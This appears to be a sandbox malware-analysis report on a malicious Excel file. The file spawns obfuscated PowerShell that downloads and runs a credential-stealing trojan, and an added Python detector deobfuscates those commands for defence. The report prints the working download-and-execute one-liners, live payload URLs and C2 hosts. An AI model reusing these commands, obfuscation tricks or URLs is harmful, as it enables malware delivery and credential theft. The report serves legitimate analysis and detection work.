      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FE57 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B00A7 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B62B1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_002B03CB SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 12; Remove-Item -Path pd.bat -Force
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 1; attrib +s +h pd.bat
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 7;cd '$e`nV:T`EMP; ./pd.bat'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe 'C:\Windows\system32\attrib.exe' +s +h pd.bat
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ''C:\Users\user\Documents\pd.bat''
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\mode.com mode 18,1
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ver
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;'
      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\cr.exe');Start-Sleep 2; Start-Process $env:appdata\cr.exe;
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Roaming\cr.exe 'C:\Users\user\AppData\Roaming\cr.exe'
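      The five PowerShell launches above all rely on the same cheap tricks: cmd.exe caret insertion (p^owersh^el^l), PowerShell backtick splitting inside bare tokens (stARt`-slE`Ep, Net.WebcL`IENt) and string concatenation ('Down'+'loadFile') so that the method name never appears whole, with -w 1 (WindowStyle Hidden) to keep the console invisible. The following is an added example written for this page, not part of the report and not the sandbox's own logic: it normalizes a command line the way a detection pipeline would before string matching, then pulls out the URL and a few behavioural indicators. It is run over the command lines above, copied as the sandbox printed them (double quotes rendered as single quotes), plus one benign control line constructed for the example; the shortener host list is a hypothetical starter set, only cutt.ly is attested here.

```python
import re
from dataclasses import dataclass
from typing import List

# Command lines copied from the process-creation events above (the sandbox prints
# double quotes as single quotes; that is kept as printed). The last entry is a
# benign control line constructed for this example.
SAMPLE_COMMAND_LINES = [
    "powershell -w 1 stARt`-slE`Ep 3; Move-Item 'pd.bat' -Destination '$e`nV:T`EMP'",
    "powershell -w 1 (nEw-oB`jecT Net.WebcLIENt).('Down'+'loadFile').Invoke('https://cutt.ly/ZjsbPXY','pd.bat')",
    "Cmd /c ' p^owersh^el^l -w 1 (nEw-oBje`cT Net.WebcL`IENt).('DownloadFile').Invoke('https://cutt.ly/0jsbUDT',($env:appdata)+'\\cr.exe');Start-Sleep 2; Start-Process $env:appdata\\cr.exe;'",
    "powershell -NoProfile -Command Get-ChildItem C:\\Users",
]

# Hypothetical starter list of URL-shortener hosts; only cutt.ly is attested in this report.
SHORTENER_HOSTS = ("cutt.ly", "bit.ly", "tinyurl.com", "t.co", "is.gd")

_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")       # 'Down'+'loadFile'
_METHOD = re.compile(r"\.\('(\w+)'\)(?:\.Invoke)?\(")     # .('Name').Invoke(
_URL = re.compile(r"https?://[^\s'\"(),;]+")


def normalize(cmd: str) -> str:
    """Undo the token obfuscation used by this sample so that string matching
    sees the real cmdlet, type and method names."""
    s = cmd.replace("^", "")   # cmd.exe caret escapes: p^owersh^el^l -> powershell
    # A backtick inside a bare PowerShell token is a no-op escape. Dropping every
    # backtick also flattens genuine `n / `t escapes inside strings, which is fine
    # here because we match on names, not on recovered string contents.
    s = s.replace("`", "")
    while True:                # join adjacent string literals until nothing changes
        joined = _CONCAT.sub(r"'\1\2'", s)
        if joined == s:
            break
        s = joined
    s = _METHOD.sub(r".\1(", s)   # .('DownloadFile').Invoke( -> .DownloadFile(
    return re.sub(r"\s+", " ", s).strip()


@dataclass
class Verdict:
    normalized: str
    urls: List[str]
    indicators: List[str]

    @property
    def suspicious(self) -> bool:
        # Bar used here: a download primitive plus at least two supporting indicators.
        return "webclient-download" in self.indicators and len(self.indicators) >= 3


def analyze(cmd: str) -> Verdict:
    norm = normalize(cmd)
    low = norm.lower()
    urls = _URL.findall(norm)
    ind = []
    if "^" in cmd or "`" in cmd or _CONCAT.search(cmd):
        ind.append("token-obfuscation")
    if re.search(r"-w(?:indowstyle)?\s+(?:1|hidden)\b", low):
        ind.append("hidden-window")            # -w 1 is -WindowStyle Hidden
    if "net.webclient" in low and re.search(r"\.download(?:file|string|data)\(", low):
        ind.append("webclient-download")
    if any(h in u.lower() for u in urls for h in SHORTENER_HOSTS):
        ind.append("url-shortener")
    if re.search(r"\b(?:start-process|invoke-expression|iex)\b", low):
        ind.append("launches-payload")
    return Verdict(norm, urls, ind)


if __name__ == "__main__":
    for v in map(analyze, SAMPLE_COMMAND_LINES):
        print("SUSPICIOUS" if v.suspicious else "ok", v.indicators, v.urls, v.normalized, sep="\n  ")
```

      Two caveats that matter when this is wired into real telemetry: matching must run on the normalized text, since the raw lines split Net.WebClient and DownloadFile differently in each launch, and dropping every backtick is a detection-side shortcut that would mangle real escape sequences if the goal were to recover string contents rather than to recognise names. Note also that the first launch only scores as obfuscated and hidden; on its own it is not enough to call, which is why the verdict keys on the download primitive.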

      Language, Device and Operating System Detection:

      Yara detected Obfuscated Powershell
      Source: Yara matchFile source: dump.pcap, type: PCAP
      Source: Yara matchFile source: C:\Users\user\Documents\pd.bat, type: DROPPED
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043FC7B cpuid
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,CoInitialize,GetUserDefaultLCID,GetLocaleInfoA,Sleep,GetUserNameA,_strlen,_strlen,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,WaitForSingleObject,CreateThread,CreateThread,CreateThread,CreateThread,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,WaitForSingleObject,CreateThread,GetModuleHandleA,FreeLibrary,WaitForSingleObject,WaitForSingleObject,GetEnvironmentVariableA,ShellExecuteA,ShellExecuteA,CoUninitialize,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: __EH_prolog,_strftime,GetUserDefaultLCID,GetLocaleInfoA,GetUserNameA,GetComputerNameA,GetUserNameA,GetSystemInfo,GlobalMemoryStatusEx,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,EnumDisplayDevicesA,EnumDisplayDevicesA,EnumDisplayDevicesA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00440023 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00434BE4 GetUserNameA,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_0043604A __EH_prolog,GetTimeZoneInformation,std::ios_base::_Ios_base_dtor,
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: 24_2_00423778 GetVersionExW,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,_memcmp,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,StrStrIW,lstrlenW,lstrlenW,FreeLibrary,
      Source: C:\Users\user\AppData\Roaming\cr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 Blob

      Stealing of Sensitive Information:

      Contains functionality to steal Internet Explorer form passwords
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Source: C:\Users\user\AppData\Roaming\cr.exeCode function: Software\Microsoft\Internet Explorer\IntelliForms\Storage2
      Tries to harvest and steal browser information (history, passwords, etc)
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
      Source: C:\Users\user\AppData\Roaming\cr.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\attrib.exeDirectory queried: C:\Users\user\Documents
      Source: C:\Windows\System32\cmd.exeDirectory queried: C:\Users\user\Documents

      Mitre Att&ck Matrix

      (The report renders this as a grid with one tactic per column; the extracted text fused the cells. Techniques are listed below per tactic column in the order they appear. Digits following a technique name are the report's hit-count badges, which the extraction ran onto the name; the grouping of those digits into separate badges is not recoverable from the extracted text.)

      Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application; Supply Chain Compromise
      Execution: Scripting 311; Native API 1; Exploitation for Client Execution 13; Command and Scripting Interpreter 13; PowerShell 2; Launchd; Scheduled Task; Command and Scripting Interpreter; PowerShell; AppleScript
      Persistence: Application Shimming 1; Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Privilege Escalation: Application Shimming 1; Process Injection 11; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job; At (Linux); At (Windows)
      Defense Evasion: Disable or Modify Tools 11; Deobfuscate/Decode Files or Information 11; Scripting 311; Obfuscated Files or Information 21; Software Packing 1; Masquerading 1; Virtualization/Sandbox Evasion 2; Process Injection 11; Masquerading; Invalid Code Signature
      Credential Access: OS Credential Dumping 2; Credentials In Files 1; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem; /etc/passwd and /etc/shadow; Network Sniffing
      Discovery: System Time Discovery 2; Account Discovery 1; File and Directory Discovery 14; System Information Discovery 36; Query Registry 1; Security Software Discovery 221; Virtualization/Sandbox Evasion 2; Process Discovery 2; System Owner/User Discovery 1; Remote System Discovery 1
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot; Software Deployment Tools; Taint Shared Content
      Collection: Archive Collected Data 1; Data from Local System 11; Screen Capture 1; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking; Data Staged; Local Data Staging
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol; Exfiltration Over Asymmetric Encrypted Non-C2 Protocol; Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol
      Command and Control: Ingress Tool Transfer 11; Encrypted Channel 22; Non-Application Layer Protocol 2; Application Layer Protocol 13; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol; Web Protocols; File Transfer Protocols
      Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols; Rogue Cellular Base Station
      Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
      Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue; Data Destruction; Data Encrypted for Impact

      Behavior Graph

      (The interactive graph and its icon legend did not survive extraction. The process tree, network endpoints, dropped files and per-node signatures recovered from the graph's text are listed below.)

      Behavior Graph ID: 337274 | Sample: ul9kpUwYel.xls | Start date: 08/01/2021 | Architecture: WINDOWS | Score: 100
      Top-level signatures: Multi AV Scanner detection for domain / URL; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 10 other signatures
      Top-level domain: trashbininspector.fun

      EXCEL.EXE  [Obfuscated command line found; Document exploit detected (process start blacklist hit)]
        cmd.exe (three instances) and 2 other processes, each starting powershell.exe (five instances in total; Obfuscated command line found)
          powershell.exe -> cutt.ly 104.22.1.232:443 (client ports 49165, 49168; CLOUDFLARENETUS, United States); 37.46.150.139:80 (client port 49167; IWAYCH, Moldova Republic of); drops C:\Users\user\Documents\pd.bat (ASCII)
          powershell.exe  [Powershell drops PE file]
          powershell.exe -> attrib.exe
          powershell.exe -> cmd.exe  [Obfuscated command line found]
            cmd.exe -> mode.com
            cmd.exe
            cmd.exe  [Suspicious powershell command line found; Tries to download and execute files (via powershell)]
              powershell.exe -> cutt.ly; chebo.discountmonumentcenter.com 192.185.194.191:80 (client port 49169; UNIFIEDLAYER-AS-1US, United States); drops C:\Users\user\AppData\Roaming\cr.exe (PE32)
                cr.exe -> trashbininspector.fun 104.18.58.219:443 (client ports 49176, 49177; CLOUDFLARENETUS, United States); telete.in 195.201.225.248:443 (client port 49174; HETZNER-ASDE, Germany); drops C:\Users\user\AppData\LocalLow\sqlite3.dll (PE32)
                  [Multi AV Scanner detection for dropped file; Machine Learning detection for dropped file; Contains functionality to steal Internet Explorer form passwords; Tries to harvest and steal browser information (history, passwords, etc)]

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      ul9kpUwYel.xls | 42% | Virustotal |
      ul9kpUwYel.xls | 25% | Metadefender |
      ul9kpUwYel.xls | 34% | ReversingLabs | Document-Word.Downloader.EncDoc

      Dropped Files

      Source | Detection | Scanner | Label
      C:\Users\user\AppData\Roaming\cr.exe | 100% | Joe Sandbox ML |
      C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | Metadefender |
      C:\Users\user\AppData\LocalLow\sqlite3.dll | 0% | ReversingLabs |
      C:\Users\user\AppData\Roaming\cr.exe | 72% | ReversingLabs | Win32.Trojan.Glupteba

      Unpacked PE Files

      Source | Detection | Scanner | Label
      24.2.cr.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1137972

      Domains

      Source | Detection | Scanner
      cutt.ly | 0% | Virustotal
      trashbininspector.fun | 8% | Virustotal
      chebo.discountmonumentcenter.com | 4% | Virustotal
      telete.in | 2% | Virustotal

      URLs

      Source | Detection | Scanner | Label
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat | 0% | Avira URL Cloud | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe | 100% | Avira URL Cloud | malware

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      cutt.ly | 104.22.1.232 | true | true | | unknown
      trashbininspector.fun | 104.18.58.219 | true | true | | unknown
      chebo.discountmonumentcenter.com | 192.185.194.191 | true | false | | unknown
      telete.in | 195.201.225.248 | true | false | | unknown

      Contacted URLs

      Name | Malicious | Antivirus Detection | Reputation
      http://37.46.150.139/bat/scriptxls_bcb01d52-349f-4210-b1fc-2540a097ee09_fteenetx_wdexclusion.bat | false | Avira URL Cloud: safe | unknown
      http://chebo.discountmonumentcenter.com/vantuz_2021.exe | true | Avira URL Cloud: malware | unknown

      URLs from Memory and Binaries

      Name | Source | Malicious | Antivirus Detection | Reputation
      http://www.piriform.com/ccleaner | powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | false | | high
      http://www.%s.comPA | powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp, powershell.exe, 00000010.00000002.2188981999.0000000002500000.00000002.00000001.sdmp | false | URL Reputation: safe | low
      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | powershell.exe, 00000007.00000002.2144318291.00000000023C0000.00000002.00000001.sdmp, powershell.exe, 0000000A.00000002.2162227868.0000000002480000.00000002.00000001.sdmp, powershell.exe, 0000000E.00000002.2144277775.00000000024C0000.00000002.00000001.sdmp | false | | high
      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | powershell.exe, 0000000A.00000002.2160741511.00000000003FE000.00000004.00000020.sdmp, powershell.exe, 0000000E.00000002.2143296812.000000000032E000.00000004.00000020.sdmp | false | | high

            Contacted IPs


            Public

            IP | Domain | Country | ASN | ASN Name | Malicious
            104.18.58.219 | unknown | United States | 13335 | CLOUDFLARENETUS | true
            195.201.225.248 | unknown | Germany | 24940 | HETZNER-ASDE | false
            192.185.194.191 | unknown | United States | 46606 | UNIFIEDLAYER-AS-1US | false
            37.46.150.139 | unknown | Moldova Republic of | 8758 | IWAYCH | false
            104.22.1.232 | unknown | United States | 13335 | CLOUDFLARENETUS | true

            General Information

            Joe Sandbox Version:31.0.0 Red Diamond
            Analysis ID:337274
            Start date:08.01.2021
            Start time:09:04:48
            Joe Sandbox Product:CloudBasic
            Overall analysis duration:0h 9m 29s
            Hypervisor based Inspection enabled:false
            Report type:light
            Sample file name:ul9kpUwYel.xls
            Cookbook file name:defaultwindowsofficecookbook.jbs
            Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
            Number of new started processes analysed:26
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • HDC enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Detection:MAL
            Classification:mal100.spyw.expl.evad.winXLS@36/22@17/5
            EGA Information:Failed
            HDC Information:Failed
            HCA Information:
            • Successful, ratio: 51%
            • Number of executed functions: 0
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Adjust boot time
            • Enable AMSI
            • Found application associated with file extension: .xls
            • Changed system and user locale, location and keyboard layout to French - France
            • Found Word or Excel or PowerPoint or XPS Viewer
            • Attach to Office via COM
            • Scroll down
            • Close Viewer
            Warnings:
            • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe, svchost.exe
            • TCP Packets have been reduced to 100
            • Excluded IPs from analysis (whitelisted): 93.184.221.240, 205.185.216.10, 205.185.216.42, 192.35.177.64
            • Excluded domains from analysis (whitelisted): wu.ec.azureedge.net, audownload.windowsupdate.nsatc.net, cs11.wpc.v0cdn.net, au.download.windowsupdate.com.hwcdn.net, hlb.apr-52dd2-0.edgecastdns.net, apps.digsigtrust.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, wu.wpc.apr-52dd2.edgecastdns.net, au-bg-shim.trafficmanager.net, wu.azureedge.net, apps.identrust.com
            • Report size exceeded maximum capacity and may have missing behavior information.
            • Report size exceeded maximum capacity and may have missing disassembly code.
            • Report size getting too big, too many NtDeviceIoControlFile calls found.
            • Report size getting too big, too many NtOpenFile calls found.
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtQueryDirectoryFile calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.

            Simulations

            Behavior and APIs

            Time | Type | Description
            09:05:58 | API Interceptor | 554x Sleep call for process: powershell.exe modified
            09:06:21 | API Interceptor | 879x Sleep call for process: cr.exe modified

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):77824
                                                        Entropy (8bit):1.1340767975888557
                                                        Encrypted:false
                                                        SSDEEP:96:rSGKaEdUDHN3ZMesTyWTJe7uKfeWb3d738Hsa/NlSGIdEd01YLvqAogv5KzzUG+H:OG8mZMDTJQb3OCaM0f6k81Vumi
                                                        MD5:9A38AC1D3304A8EEFD9C54D4EADCCCD6
                                                        SHA1:56E953B2827B37491BC80E3BFDBBF535F95EDFA7
                                                        SHA-256:67960A6297477E9F2354B384ECFE698BEB2C1FA1F9168BEAC08D2E270CE3558C
                                                        SHA-512:32281388C0DE6AA73FCFF0224450E45AE5FB970F5BA3E72DA1DE4E39F80BFC6FE1E27AAECC6C08165D2BF625DF57F3EE3FC1115BF1F4BA6DDE0EB4F69CD0C77D
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:Microsoft Cabinet archive data, 58936 bytes, 1 file
                                                        Category:dropped
                                                        Size (bytes):58936
                                                        Entropy (8bit):7.994797855729196
                                                        Encrypted:true
                                                        SSDEEP:768:A2CCXehkvodpN73AJjDzh85ApA37vK5clxQh+aLE/sSkoWYrgEHqCinmXdBDz2mi:i/LAvEZrGclx0hoW6qCLdNz2pj
                                                        MD5:E4F1E21910443409E81E5B55DC8DE774
                                                        SHA1:EC0885660BD216D0CDD5E6762B2F595376995BD0
                                                        SHA-256:CF99E08369397577BE949FBF1E4BF06943BC8027996AE65CEB39E38DD3BD30F5
                                                        SHA-512:2253849FADBCDF2B10B78A8B41C54E16DB7BB300AAA1A5A151EDA2A7AA64D5250AED908C3B46AFE7262E66D957B255F6D57B6A6BB9E4F9324F2C22E9BF088246
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):893
                                                        Entropy (8bit):7.366016576663508
                                                        Encrypted:false
                                                        SSDEEP:24:hBntmDvKUQQDvKUr7C5fpqp8gPvXHmXvponXux:3ntmD5QQD5XC5RqHHXmXvp++x
                                                        MD5:D4AE187B4574036C2D76B6DF8A8C1A30
                                                        SHA1:B06F409FA14BAB33CBAF4A37811B8740B624D9E5
                                                        SHA-256:A2CE3A0FA7D2A833D1801E01EC48E35B70D84F3467CC9F8FAB370386E13879C7
                                                        SHA-512:1F44A360E8BB8ADA22BC5BFE001F1BABB4E72005A46BC2A94C33C4BD149FF256CCE6F35D65CA4F7FC2A5B9E15494155449830D2809C8CF218D0B9196EC646B0C
                                                        Malicious:false
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):326
                                                        Entropy (8bit):3.1121144470001534
                                                        Encrypted:false
                                                        SSDEEP:6:kKpAFwwDN+SkQlPlEGYRMY9z+4KlDA3RUegeT6lf:mykPlE99SNxAhUegeT2
                                                        MD5:245D002CE8629C434AA6D1ABBC88246E
                                                        SHA1:4BD8B6059AE578468BF700C2848F5D6F24475CB6
                                                        SHA-256:EC375FD4940F7DFF765BB2183318499C4CB078C7FF05831052550834AD1DEADC
                                                        SHA-512:24E95C9D034B9A6480C2989582AF0835CEF463340E51104A123E63FBAEE9B0B67DC783FB86FA8A9C6F24FCC8259A31B65B08030DF87676FA9F1C2A54F71482CF
                                                        Malicious:false
                                                        Preview: p...... .........Ku.....(....................................................... ..........Y.......$...........8...h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.6.9.5.5.9.e.2.a.0.d.6.1.:.0."...
                                                        C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E0F5C59F9FA661F6F4C50B87FEF3A15A
                                                        Process:C:\Users\user\AppData\Roaming\cr.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):252
                                                        Entropy (8bit):3.0215269645321685
                                                        Encrypted:false
